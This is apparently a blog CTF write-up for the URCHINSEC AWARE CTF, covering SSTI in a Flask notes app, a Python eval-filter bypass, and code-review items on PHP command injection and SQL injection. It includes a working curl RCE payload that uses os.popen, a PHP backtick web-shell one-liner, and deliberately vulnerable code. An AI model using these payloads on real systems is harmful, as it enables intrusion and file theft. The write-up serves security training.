root💀senseicat:~#

Hack. Eat. Sleep. Repeat!!!

Project maintained by SENSEiXENUS Hosted on GitHub Pages — Theme by mattgraham

CTF: URCHINSEC AWARE CTF

CHALLENGES:

Web:
- Notee
- Pyrison
Secure code Review:
- Heart
- Redhand
- Syringe

WEB:

Notee:

The challenge’s main vulnerability is Server Side Template Injection and the code detailed below shows the sink.

@app.route('/<username>/note/<id>/comment', methods=['GET'])
def get_comments_note(username, id):
    note = Note.query.filter_by(id=id).first()
    if note is not None:
        # check if username inserted matches the note
        if note.username == username:
            return render_template_string(note.comment)
        else:
            return abort(403)
    else:
        return abort(404)

Route /<username>/note/<id>/comment takes in the comment key retrieved from the note variable and passes it to render_template_string which is vulnerable to the sink.The note’s variable is from the POST parameters filled in the index page.The main point to pass the payload is the comment input box.

@app.route('/', methods=['GET', 'POST'])
def index():
    if request.method == 'GET':
        return render_template('index.html')
    elif request.method == 'POST':
        username = request.form.get('username')
        title = request.form.get('title')
        description = request.form.get('description')
        comment = request.form.get('comment')
        user_ip = request.remote_addr

Exploitation

I added the payload below to the comment box.

I retrieved the flag with curl.

Flag-:urchinsec{W3_KEEP_NOTES_SAfe_f0r_ouR_S3cr3t_r3cipesss}

Pyrison

This challenge requires blackbox testing because no source code was provided but based on the author’s choice of name.I deduced that the backend is python and values are passed to eval() in python but some special keywords are filtered.
I tested 7*7 and got the value 49 which signifies that my deductions are accurate.

I also tried import to import modules but I noticed that the author blacklisted it.

I tried the next method by passing eval("__IMPORT__".lower()) which worked because the filter is not case sensitive and picks only import in lowercase and not in uppercase.I passed the uppercase import to the lower() to convert it to lowercase which is evaluated later with the eval() function.You can see below that we’ve successfully called the import function.

Now,we can import module we like and gain RCE, I picked os.popen to read the flag.

Final Payload-:curl https://urchinsec-pyrison.chals.io/test/trick -X POST -d "query=eval('__IMPORT__'.lower())('os').popen('cat /*').read()"

Flag-:urchinsec{H3r3_we_go_again_byp4ssing_evals_f0rFUN}

SECURE CODE REVIEW-:

Heart:

The code is vulnerable to Server Side Template Injection because of the render_template_string() function

Flag-:urchinsec{9_SSTI}

REDHAND

The code is vulnerable to command-injection because php execute any code between backticks as system commands.

<?=`$_GET[0]`?>

Flag-:urchinsec{command_injection}

SYRINGE:

The code below is vulnerable to sql_injection, an attacker can close the first statement and execute an arbitrary statement.

Flag-:urchinsec{15_sql_injection}

THANKS FOR READING